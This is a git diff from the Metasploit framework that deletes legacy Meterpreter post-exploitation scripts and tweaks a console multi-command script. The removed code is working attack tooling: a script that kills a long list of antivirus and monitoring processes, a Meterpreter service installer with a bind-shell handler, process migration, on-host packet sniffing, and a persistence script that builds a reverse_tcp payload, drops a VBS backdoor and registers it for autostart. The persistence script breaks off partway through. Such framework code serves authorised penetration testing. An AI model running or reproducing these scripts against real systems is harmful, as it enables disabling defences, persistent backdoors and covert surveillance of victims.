-#
-
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ]
-)
-def usage
- print_line("Usage:" + @@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- end
-}
-
-print_status("Killing Antivirus services on the target...")
-
-avs = %W{
- AAWTray.exe
- Ad-Aware.exe
- MSASCui.exe
- _avp32.exe
- _avpcc.exe
- _avpm.exe
- aAvgApi.exe
- ackwin32.exe
- adaware.exe
- advxdwin.exe
- agentsvr.exe
- agentw.exe
- alertsvc.exe
- alevir.exe
- alogserv.exe
- amon9x.exe
- anti-trojan.exe
- antivirus.exe
- ants.exe
- apimonitor.exe
- aplica32.exe
- apvxdwin.exe
- arr.exe
- atcon.exe
- atguard.exe
- atro55en.exe
- atupdater.exe
- atwatch.exe
- au.exe
- aupdate.exe
- auto-protect.nav80try.exe
- autodown.exe
- autotrace.exe
- autoupdate.exe
- avconsol.exe
- ave32.exe
- avgcc32.exe
- avgctrl.exe
- avgemc.exe
- avgnt.exe
- avgrsx.exe
- avgserv.exe
- avgserv9.exe
- avguard.exe
- avgw.exe
- avkpop.exe
- avkserv.exe
- avkservice.exe
- avkwctl9.exe
- avltmain.exe
- avnt.exe
- avp.exe
- avp.exe
- avp32.exe
- avpcc.exe
- avpdos32.exe
- avpm.exe
- avptc32.exe
- avpupd.exe
- avsched32.exe
- avsynmgr.exe
- avwin.exe
- avwin95.exe
- avwinnt.exe
- avwupd.exe
- avwupd32.exe
- avwupsrv.exe
- avxmonitor9x.exe
- avxmonitornt.exe
- avxquar.exe
- backweb.exe
- bargains.exe
- bd_professional.exe
- beagle.exe
- belt.exe
- bidef.exe
- bidserver.exe
- bipcp.exe
- bipcpevalsetup.exe
- bisp.exe
- blackd.exe
- blackice.exe
- blink.exe
- blss.exe
- bootconf.exe
- bootwarn.exe
- borg2.exe
- bpc.exe
- brasil.exe
- bs120.exe
- bundle.exe
- bvt.exe
- ccapp.exe
- ccevtmgr.exe
- ccpxysvc.exe
- cdp.exe
- cfd.exe
- cfgwiz.exe
- cfiadmin.exe
- cfiaudit.exe
- cfinet.exe
- cfinet32.exe
- claw95.exe
- claw95cf.exe
- clean.exe
- cleaner.exe
- cleaner3.exe
- cleanpc.exe
- click.exe
- cmd.exe
- cmd32.exe
- cmesys.exe
- cmgrdian.exe
- cmon016.exe
- connectionmonitor.exe
- cpd.exe
- cpf9x206.exe
- cpfnt206.exe
- ctrl.exe
- cv.exe
- cwnb181.exe
- cwntdwmo.exe
- datemanager.exe
- dcomx.exe
- defalert.exe
- defscangui.exe
- defwatch.exe
- deputy.exe
- divx.exe
- dllcache.exe
- dllreg.exe
- doors.exe
- dpf.exe
- dpfsetup.exe
- dpps2.exe
- drwatson.exe
- drweb32.exe
- drwebupw.exe
- dssagent.exe
- dvp95.exe
- dvp95_0.exe
- ecengine.exe
- efpeadm.exe
- emsw.exe
- ent.exe
- esafe.exe
- escanhnt.exe
- escanv95.exe
- espwatch.exe
- ethereal.exe
- etrustcipe.exe
- evpn.exe
- exantivirus-cnet.exe
- exe.avxw.exe
- expert.exe
- explore.exe
- f-agnt95.exe
- f-prot.exe
- f-prot95.exe
- f-stopw.exe
- fameh32.exe
- fast.exe
- fch32.exe
- fih32.exe
- findviru.exe
- firewall.exe
- fnrb32.exe
- fp-win.exe
- fp-win_trial.exe
- fprot.exe
- frw.exe
- fsaa.exe
- fsav.exe
- fsav32.exe
- fsav530stbyb.exe
- fsav530wtbyb.exe
- fsav95.exe
- fsgk32.exe
- fsm32.exe
- fsma32.exe
- fsmb32.exe
- gator.exe
- gbmenu.exe
- gbpoll.exe
- generics.exe
- gmt.exe
- guard.exe
- guarddog.exe
- hacktracersetup.exe
- hbinst.exe
- hbsrv.exe
- hotactio.exe
- hotpatch.exe
- htlog.exe
- htpatch.exe
- hwpe.exe
- hxdl.exe
- hxiul.exe
- iamapp.exe
- iamserv.exe
- iamstats.exe
- ibmasn.exe
- ibmavsp.exe
- icload95.exe
- icloadnt.exe
- icmon.exe
- icsupp95.exe
- icsuppnt.exe
- idle.exe
- iedll.exe
- iedriver.exe
- iexplorer.exe
- iface.exe
- ifw2000.exe
- inetlnfo.exe
- infus.exe
- infwin.exe
- init.exe
- intdel.exe
- intren.exe
- iomon98.exe
- istsvc.exe
- jammer.exe
- jdbgmrg.exe
- jedi.exe
- kavlite40eng.exe
- kavpers40eng.exe
- kavpf.exe
- kazza.exe
- keenvalue.exe
- kerio-pf-213-en-win.exe
- kerio-wrl-421-en-win.exe
- kerio-wrp-421-en-win.exe
- kernel32.exe
- killprocesssetup161.exe
- launcher.exe
- ldnetmon.exe
- ldpro.exe
- ldpromenu.exe
- ldscan.exe
- lnetinfo.exe
- loader.exe
- localnet.exe
- lockdown.exe
- lockdown2000.exe
- lookout.exe
- lordpe.exe
- lsetup.exe
- luall.exe
- luau.exe
- lucomserver.exe
- luinit.exe
- luspt.exe
- mapisvc32.exe
- mcagent.exe
- mcmnhdlr.exe
- mcshield.exe
- mctool.exe
- mcupdate.exe
- mcvsrte.exe
- mcvsshld.exe
- md.exe
- mfin32.exe
- mfw2en.exe
- mfweng3.02d30.exe
- mgavrtcl.exe
- mgavrte.exe
- mghtml.exe
- mgui.exe
- minilog.exe
- mmod.exe
- monitor.exe
- moolive.exe
- mostat.exe
- mpfagent.exe
- mpfservice.exe
- mpftray.exe
- mrflux.exe
- msapp.exe
- msbb.exe
- msblast.exe
- mscache.exe
- msccn32.exe
- mscman.exe
- msconfig.exe
- msdm.exe
- msdos.exe
- msiexec16.exe
- msinfo32.exe
- mslaugh.exe
- msmgt.exe
- msmsgri32.exe
- mssmmc32.exe
- mssys.exe
- msvxd.exe
- mu0311ad.exe
- mwatch.exe
- n32scanw.exe
- nav.exe
- navap.navapsvc.exe
- navapsvc.exe
- navapw32.exe
- navdx.exe
- navlu32.exe
- navnt.exe
- navstub.exe
- navw32.exe
- navwnt.exe
- nc2000.exe
- ncinst4.exe
- ndd32.exe
- neomonitor.exe
- neowatchlog.exe
- netarmor.exe
- netd32.exe
- netinfo.exe
- netmon.exe
- netscanpro.exe
- netspyhunter-1.2.exe
- netstat.exe
- netutils.exe
- nisserv.exe
- nisum.exe
- nmain.exe
- nod32.exe
- normist.exe
- norton_internet_secu_3.0_407.exe
- notstart.exe
- npf40_tw_98_nt_me_2k.exe
- npfmessenger.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nsched32.exe
- nssys32.exe
- nstask32.exe
- nsupdate.exe
- nt.exe
- ntrtscan.exe
- ntvdm.exe
- ntxconfig.exe
- nui.exe
- nupgrade.exe
- nvarch16.exe
- nvc95.exe
- nvsvc32.exe
- nwinst4.exe
- nwservice.exe
- nwtool16.exe
- ollydbg.exe
- onsrvr.exe
- optimize.exe
- ostronet.exe
- otfix.exe
- outpost.exe
- outpostinstall.exe
- outpostproinstall.exe
- padmin.exe
- panixk.exe
- patch.exe
- pavcl.exe
- pavproxy.exe
- pavsched.exe
- pavw.exe
- pccwin98.exe
- pcfwallicon.exe
- pcip10117_0.exe
- pcscan.exe
- pdsetup.exe
- periscope.exe
- persfw.exe
- perswf.exe
- pf2.exe
- pfwadmin.exe
- pgmonitr.exe
- pingscan.exe
- platin.exe
- pop3trap.exe
- poproxy.exe
- popscan.exe
- portdetective.exe
- portmonitor.exe
- powerscan.exe
- ppinupdt.exe
- pptbc.exe
- ppvstop.exe
- prizesurfer.exe
- prmt.exe
- prmvr.exe
- procdump.exe
- processmonitor.exe
- procexplorerv1.0.exe
- programauditor.exe
- proport.exe
- protectx.exe
- pspf.exe
- purge.exe
- qconsole.exe
- qserver.exe
- rapapp.exe
- rav7.exe
- rav7win.exe
- rav8win32eng.exe
- ray.exe
- rb32.exe
- rcsync.exe
- realmon.exe
- reged.exe
- regedit.exe
- regedt32.exe
- rescue.exe
- rescue32.exe
- rrguard.exe
- rshell.exe
- rtvscan.exe
- rtvscn95.exe
- rulaunch.exe
- run32dll.exe
- rundll.exe
- rundll16.exe
- ruxdll32.exe
- safeweb.exe
- sahagent.exe
- save.exe
- savenow.exe
- sbserv.exe
- sc.exe
- scam32.exe
- scan32.exe
- scan95.exe
- scanpm.exe
- scrscan.exe
- serv95.exe
- setup_flowprotector_us.exe
- setupvameeval.exe
- sfc.exe
- sgssfw32.exe
- sh.exe
- shellspyinstall.exe
- shn.exe
- showbehind.exe
- smc.exe
- sms.exe
- smss32.exe
- soap.exe
- sofi.exe
- sperm.exe
- spf.exe
- sphinx.exe
- spoler.exe
- spoolcv.exe
- spoolsv32.exe
- spyxx.exe
- srexe.exe
- srng.exe
- ss3edit.exe
- ssg_4104.exe
- ssgrate.exe
- st2.exe
- start.exe
- stcloader.exe
- supftrl.exe
- support.exe
- supporter5.exe
- svc.exe
- svchostc.exe
- svchosts.exe
- svshost.exe
- sweep95.exe
- sweepnet.sweepsrv.sys.swnetsup.exe
- symproxysvc.exe
- symtray.exe
- sysedit.exe
- system.exe
- system32.exe
- sysupd.exe
- taskmg.exe
- taskmgr.exe
- taskmo.exe
- taskmon.exe
- taumon.exe
- tbscan.exe
- tc.exe
- tca.exe
- tcm.exe
- tds-3.exe
- tds2-98.exe
- tds2-nt.exe
- teekids.exe
- tfak.exe
- tfak5.exe
- tgbob.exe
- titanin.exe
- titaninxp.exe
- tracert.exe
- trickler.exe
- trjscan.exe
- trjsetup.exe
- trojantrap3.exe
- tsadbot.exe
- tvmd.exe
- tvtmd.exe
- undoboot.exe
- updat.exe
- update.exe
- upgrad.exe
- utpost.exe
- vbcmserv.exe
- vbcons.exe
- vbust.exe
- vbwin9x.exe
- vbwinntw.exe
- vcsetup.exe
- vet32.exe
- vet95.exe
- vettray.exe
- vfsetup.exe
- vir-help.exe
- virusmdpersonalfirewall.exe
- vnlan300.exe
- vnpc3000.exe
- vpc32.exe
- vpc42.exe
- vpfw30s.exe
- vptray.exe
- vscan40.exe
- vscenu6.02d30.exe
- vsched.exe
- vsecomr.exe
- vshwin32.exe
- vsisetup.exe
- vsmain.exe
- vsmon.exe
- vsstat.exe
- vswin9xe.exe
- vswinntse.exe
- vswinperse.exe
- w32dsm89.exe
- w9x.exe
- watchdog.exe
- webdav.exe
- webscanx.exe
- webtrap.exe
- wfindv32.exe
- whoswatchingme.exe
- wimmun32.exe
- win-bugsfix.exe
- win32.exe
- win32us.exe
- winactive.exe
- window.exe
- windows.exe
- wininetd.exe
- wininitx.exe
- winlogin.exe
- winmain.exe
- winnet.exe
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zonalm2601.exe
- zonealarm.exe
-}
-
-client.sys.process.get_processes().each do |x|
- if (avs.index(x['name'].downcase))
- print_status("Killing off #{x['name']}...")
- client.sys.process.kill(x['pid'])
- end
-end
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
deleted file mode 100644
index 7eafcef435..0000000000
--- a/scripts/meterpreter/metsvc.rb
+++ /dev/null
@@ -1,139 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Meterpreter script for installing the meterpreter service
-#
-
-session = client
-
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],
- "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"]
-)
-
-# Exec a command and return the results
-def m_exec(session, cmd)
- r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
- b = ""
- while(d = r.channel.read)
- b << d
- end
- r.channel.close
- r.close
- b
-end
-
-#
-# Default parameters
-#
-
-based = File.join(Msf::Config.data_directory, "meterpreter")
-rport = 31337
-install = false
-autoconn = false
-remove = false
-if client.platform =~ /win32|win64/
-
- #
- # Option parsing
- #
- opts.parse(args) do |opt, idx, val|
- case opt
- when "-h"
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-A"
- autoconn = true
- when "-r"
- remove = true
- end
- end
-
- #
- # Create the persistent VBS
- #
-
- if(not remove)
- print_status("Creating a meterpreter service on port #{rport}")
- else
- print_status("Removing the existing Meterpreter service")
- end
-
- #
- # Upload to the filesystem
- #
-
- tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
-
- print_status("Creating a temporary installation directory #{tempdir}...")
- client.fs.dir.mkdir(tempdir)
-
- # Use an array of `from -> to` associations so that things
- # such as metsrv can be copied from the appropriate location
- # but named correctly on the target.
- bins = {
- 'metsrv.x86.dll' => 'metsrv.dll',
- 'metsvc-server.exe' => nil,
- 'metsvc.exe' => nil
- }
-
- bins.each do |from, to|
- next if (from != "metsvc.exe" and remove)
- to ||= from
- print_status(" >> Uploading #{from}...")
- fd = client.fs.file.new(tempdir + "\\" + to, "wb")
- path = (from == 'metsrv.x86.dll') ? MetasploitPayloads.meterpreter_path('metsrv','x86.dll') : File.join(based, from)
- fd.write(::File.read(path, ::File.size(path)))
- fd.close
- end
-
- #
- # Execute the agent
- #
- if(not remove)
- print_status("Starting the service...")
- client.fs.dir.chdir(tempdir)
- data = m_exec(client, "metsvc.exe install-service")
- print_line("\t#{data}")
- else
- print_status("Stopping the service...")
- client.fs.dir.chdir(tempdir)
- data = m_exec(client, "metsvc.exe remove-service")
- print_line("\t#{data}")
- end
-
- if(remove)
- m_exec(client, "cmd.exe /c del metsvc.exe")
- end
-
- #
- # Setup the exploit/multi/handler if requested
- #
- if(autoconn)
- print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
- mul = client.framework.exploits.create("multi/handler")
- mul.datastore['WORKSPACE'] = client.workspace
- mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
- mul.datastore['LPORT'] = rport
- mul.datastore['RHOST'] = client.session_host
- mul.datastore['ExitOnSession'] = false
- mul.exploit_simple(
- 'Payload' => mul.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
- end
-
-else
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb
deleted file mode 100644
index c8d1a1760b..0000000000
--- a/scripts/meterpreter/migrate.rb
+++ /dev/null
@@ -1,96 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Simple example script that migrates to a specific process by name.
-# This is meant as an illustration.
-#
-
-
-spawn = false
-kill = false
-target_pid = nil
-target_name = nil
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-f" => [ false, "Launch a process and migrate into the new process"],
- "-p" => [ true , "PID to migrate to."],
- "-k" => [ false, "Kill original process."],
- "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
-)
-
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-f"
- spawn = true
- when "-k"
- kill = true
- when "-p"
- target_pid = val.to_i
- when "-n"
- target_name = val.to_s
- when "-h"
- print_line(opts.usage)
- raise Rex::Script::Completed
- else
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-
-# Creates a temp notepad.exe to migrate to depending the architecture.
-def create_temp_proc()
- # Use the system path for executable to run
- cmd = "notepad.exe"
- # run hidden
- proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
- return proc.pid
-end
-
-# In case no option is provided show help
-if args.length == 0
- print_line(opts.usage)
- raise Rex::Script::Completed
-end
-
-### Main ###
-
-if client.platform =~ /win32|win64/
- server = client.sys.process.open
- original_pid = server.pid
- print_status("Current server process: #{server.name} (#{server.pid})")
-
- if spawn
- print_status("Spawning notepad.exe process to migrate to")
- target_pid = create_temp_proc
- end
-
- if target_name and not target_pid
- target_pid = client.sys.process[target_name]
- if not target_pid
- print_status("Could not identify the process ID for #{target_name}")
- raise Rex::Script::Completed
- end
- end
-
- begin
- print_good("Migrating to #{target_pid}")
- client.core.migrate(target_pid)
- print_good("Successfully migrated to process #{}")
- rescue ::Exception => e
- print_error("Could not migrate in to process.")
- print_error(e)
- end
-
- if kill
- print_status("Killing original process with PID #{original_pid}")
- client.sys.process.kill(original_pid)
- print_good("Successfully killed process with PID #{original_pid}")
- end
-end
diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb
index 0cbb87993c..d456741102 100644
--- a/scripts/meterpreter/multi_console_command.rb
+++ b/scripts/meterpreter/multi_console_command.rb
@@ -17,40 +17,22 @@
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
+ "-sl" => [ false,"Hide commands output for work in background sessions"],
"-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
"-rc" => [ true,"Text file with list of commands, one per line."]
)
-#Setting Argument variables
commands = nil
script = []
-help = 0
-
-################## Function Declarations ##################
-# Function for running a list of commands stored in a array, returs string
-def list_con_exec(cmdlst)
- print_status("Running Command List ...")
- cmdout = ""
- cmdlst.each do |cmd|
- next if cmd.strip.length < 1
- next if cmd[0,1] == "#"
- begin
- print_status "\tRunning command #{cmd}"
- @client.console.run_single(cmd)
- rescue ::Exception => e
- print_status("Error Running Command #{cmd}: #{e.class} #{e}")
- end
- end
- cmdout
-end
-
+help = false
+silence = false
def usage
print_line("Console Multi Command Execution Meterpreter Script ")
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
-################## Main ##################
+
@@exec_opts.parse(args) { |opt, idx, val|
case opt
@@ -68,14 +50,34 @@ end
end
when "-h"
- help = 1
+ help = true
+ when "-sl"
+ silence = true
end
}
-if args.length == 0 or help == 1 or commands.nil?
+if args.length == 0 or help or commands.nil?
usage
-else
- list_con_exec(commands)
- raise Rex::Script::Completed
end
+print_status("Running Command List ...")
+
+commands.each do |cmd|
+ next if cmd.strip.length < 1
+ next if cmd[0,1] == "#"
+ begin
+ print_status "\tRunning command #{cmd}"
+ if silence
+ @client.console.disable_output = true
+ end
+
+ @client.console.run_single(cmd)
+
+ if silence
+ @client.console.disable_output = false
+ end
+
+ rescue ::Exception => e
+ print_status("Error Running Command #{cmd}: #{e.class} #{e}")
+ end
+end
diff --git a/scripts/meterpreter/packetrecorder.rb b/scripts/meterpreter/packetrecorder.rb
deleted file mode 100644
index ba3e5dc1e2..0000000000
--- a/scripts/meterpreter/packetrecorder.rb
+++ /dev/null
@@ -1,219 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-
-@client = client
-
-# Interval for recording packets
-rec_time = 30
-
-# Interface ID
-int_id = nil
-
-# List Interfaces
-list_int = nil
-
-# Log Folder
-log_dest = nil
-@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-t" => [ true, "Time interval in seconds between recollection of packet, default 30 seconds."],
- "-i" => [ true, "Interface ID number where all packet capture will be done."],
- "-li" => [ false, "List interfaces that can be used for capture."],
- "-l" => [ true, "Specify and alternate folder to save PCAP file."]
-)
-meter_type = client.platform
-
-################## Function Declarations ##################
-
-# Usage Message Function
-#-------------------------------------------------------------------------------
-def usage
- print_line "Meterpreter Script for capturing packets in to a PCAP file"
- print_line "on a target host given a interface ID."
- print_line(@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Function for creating log folder and returning log pa
-#-------------------------------------------------------------------------------
-def log_file(log_path = nil)
- #Get hostname
- host = @client.sys.config.sysinfo["Computer"]
-
- # Create Filename info to be appended to downloaded files
- filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
- # Create a directory for the logs
- if log_path
- logs = ::File.join(log_path, 'logs', 'packetrecorder', host + filenameinfo )
- else
- logs = ::File.join(Msf::Config.log_directory, "scripts", 'packetrecorder', host + filenameinfo )
- end
-
- # Create the log directory
- ::FileUtils.mkdir_p(logs)
-
- #logfile name
- logfile = logs + ::File::Separator + host + filenameinfo + ".cap"
- return Rex::FileUtils.clean_path(logfile)
-end
-
-#Function for Starting Capture
-#-------------------------------------------------------------------------------
-def startsniff(interface_id)
- begin
- #Load Sniffer module
- @client.core.use("sniffer")
- print_status("Starting Packet capture on interface #{interface_id}")
- #starting packet capture with a buffer size of 200,000 packets
- @client.sniffer.capture_start(interface_id, 200000)
- print_good("Packet capture started")
- rescue ::Exception => e
- print_status("Error Starting Packet Capture: #{e.class} #{e}")
- raise Rex::Script::Completed
- end
-end
-
-#Function for Recording captured packets into PCAP file
-#-------------------------------------------------------------------------------
-def packetrecord(packtime, logfile,intid)
- begin
- rec = 1
- print_status("Packets being saved in to #{logfile}")
- print_status("Packet capture interval is #{packtime} Seconds")
- #Inserting Packets every number of seconds specified
- while rec == 1
- path_cap = logfile
- path_raw = logfile + '.raw'
- fd = ::File.new(path_raw, 'wb+')
- #Flushing Buffers
- res = @client.sniffer.capture_dump(intid)
- bytes_all = res[:bytes] || 0
- bytes_got = 0
- bytes_pct = 0
- while (bytes_all > 0)
- res = @client.sniffer.capture_dump_read(intid,1024*512)
- bytes_got += res[:bytes]
- pct = ((bytes_got.to_f / bytes_all.to_f) * 100).to_i
- if(pct > bytes_pct)
- bytes_pct = pct
- end
- break if res[:bytes] == 0
- fd.write(res[:data])
- end
-
- fd.close
- #Converting raw file to PCAP
- fd = nil
- if(::File.exist?(path_cap))
- fd = ::File.new(path_cap, 'ab+')
- else
- fd = ::File.new(path_cap, 'wb+')
- fd.write([0xa1b2c3d4, 2, 4, 0, 0, 65536, 1].pack('NnnNNNN'))
- end
- od = ::File.new(path_raw, 'rb')
-
- # TODO: reorder packets based on the ID (only an issue if the buffer wraps)
- while(true)
- buf = od.read(20)
- break if not buf
-
- idh,idl,thi,tlo,len = buf.unpack('N5')
- break if not len
- if(len > 10000)
- print_error("Corrupted packet data (length:#{len})")
- break
- end
-
- pkt_ts = Rex::Proto::SMB::Utils.time_smb_to_unix(thi,tlo)
- pkt = od.read(len)
- fd.write([pkt_ts,0,len,len].pack('NNNN')+pkt)
- end
- od.close
- fd.close
-
- ::File.unlink(path_raw)
- sleep(2)
- sleep(packtime.to_i)
-
- end
- rescue::Exception => e
- print("\n")
- print_status("#{e.class} #{e}")
- print_good("Stopping Packet sniffer...")
- @client.sniffer.capture_stop(intid)
- end
-end
-
-# Function for listing interfaces
-# ------------------------------------------------------------------------------
-def int_list()
- begin
- @client.core.use("sniffer")
- ifaces = @client.sniffer.interfaces()
-
- print_line()
-
- ifaces.each do |i|
- print_line(sprintf("%d - '%s' ( type:%d mtu:%d usable:%s dhcp:%s wifi:%s )",
- i['idx'], i['description'],
- i['type'], i['mtu'], i['usable'], i['dhcp'], i['wireless'])
- )
- end
-
- print_line()
- rescue ::Exception => e
- print_error("Error listing interface: #{e.class} #{e}")
- end
- raise Rex::Script::Completed
-end
-
-################## Main ##################
-@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- when "-i"
- int_id = val.to_i
- when "-l"
- log_dest = val
- when "-li"
- list_int = 1
- when "-t"
- rec_time = val
- end
-}
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-
-if !int_id.nil? or !list_int.nil?
- if not is_uac_enabled? or is_admin?
- if !list_int.nil?
- int_list
- else
- pcap_file = log_file(log_dest)
- startsniff(int_id)
- packetrecord(rec_time,pcap_file,int_id)
- end
- else
- print_error("Access denied (UAC enabled?)")
- end
-else
- usage
-end
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
deleted file mode 100644
index a191115725..0000000000
--- a/scripts/meterpreter/persistence.rb
+++ /dev/null
@@ -1,259 +0,0 @@
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-# Meterpreter Session
-@client = client
-
-key = "HKLM"
-
-# Default parameters for payload
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-delay = 5
-install = false
-autoconn = false
-serv = false
-altexe = nil
-target_dir = nil
-payload_type = "windows/meterpreter/reverse_tcp"
-script = nil
-script_on_target = nil
-
-
-@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on which the system running Metasploit is listening"],
- "-i" => [ true, "The interval in seconds between each connection attempt"],
- "-X" => [ false, "Automatically start the agent when the system boots"],
- "-U" => [ false, "Automatically start the agent when the User logs on"],
- "-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
- "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"],
- "-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."],
- "-T" => [ true, "Alternate executable template to use"],
- "-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]
-)
-
-################## Function Declarations ##################
-
-# Usage Message Function
-#-------------------------------------------------------------------------------
-def usage
- print_line "Meterpreter Script for creating a persistent backdoor on a target host."
- print_line(@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Function for Creating the Payload
-#-------------------------------------------------------------------------------
-def create_payload(payload_type,lhost,lport)
- print_status("Creating Payload=#{payload_type} LHOST=#{lhost} LPORT=#{lport}")
- payload = payload_type
- pay = client.framework.payloads.create(payload)
- pay.datastore['LHOST'] = lhost
- pay.datastore['LPORT'] = lport
- return pay.generate
-end
-
-# Function for Creating persistent script
-#-------------------------------------------------------------------------------
-def create_script(delay,altexe,raw,is_x64)
- if is_x64
- if altexe
- vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay, :template => altexe})
- else
- vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay})
- end
- else
- if altexe
- vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay, :template => altexe})
- else
- vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay})
- end
- end
- print_status("Persistent agent script is #{vbs.length} bytes long")
- return vbs
-end
-
-# Function for creating log folder and returning log path
-#-------------------------------------------------------------------------------
-def log_file(log_path = nil)
- #Get hostname
- host = @client.sys.config.sysinfo["Computer"]
-
- # Create Filename info to be appended to downloaded files
- filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
- # Create a directory for the logs
- if log_path
- logs = ::File.join(log_path, 'logs', 'persistence',
- Rex::FileUtils.clean_path(host + filenameinfo) )
- else
- logs = ::File.join(Msf::Config.log_directory, 'persistence',
- Rex::FileUtils.clean_path(host + filenameinfo) )
- end
-
- # Create the log directory
- ::FileUtils.mkdir_p(logs)
-
- #logfile name
- logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
- return logfile
-end
-
-# Function for writing script to target host
-#-------------------------------------------------------------------------------
-def write_script_to_target(target_dir,vbs)
- if target_dir
- tempdir = target_dir
- else
- tempdir = @client.fs.file.expand_path("%TEMP%")
- end
- tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- fd = @client.fs.file.new(tempvbs, "wb")
- fd.write(vbs)
- fd.close
- print_good("Persistent Script written to #{tempvbs}")
- # Escape windows pathname separators.
- file_local_write(@clean_up_rc, "rm #{tempvbs.gsub(/\\/, '//')}\n")
- return tempvbs
-end
-
-# Function for setting exploit/multi/handler for autocon
-#-------------------------------------------------------------------------------
-def set_handler(selected_payload,rhost,rport)
- print_status("Starting connection handler at port #{rport} for #{selected_payload}")
- mul = client.framework.exploits.create("multi/handler")
- mul.datastore['WORKSPACE'] = @client.workspace
- mul.datastore['PAYLOAD'] = selected_payload
- mul.datastore['LHOST'] = rhost
- mul.datastore['LPORT'] = rport
- mul.datastore['EXITFUNC'] = 'process'
- mul.datastore['ExitOnSession'] = false
-
- mul.exploit_simple(
- 'Payload' => mul.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
- print_good("exploit/multi/handler started!")
-end
-
-# Function to execute script on target and return the PID of the process
-#-------------------------------------------------------------------------------
-def targets_exec(script_on_target)
- print_status("Executing script #{script_on_target}")
- proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true})
- print_good("Agent executed with PID #{proc.pid}")
- return proc.pid
-end
-
-# Function to install payload in to the registry HKLM or HKCU
-#-------------------------------------------------------------------------------
-def write_to_reg(key,script_on_target)
- nam = Rex::Text.rand_text_alpha(rand(8)+8)
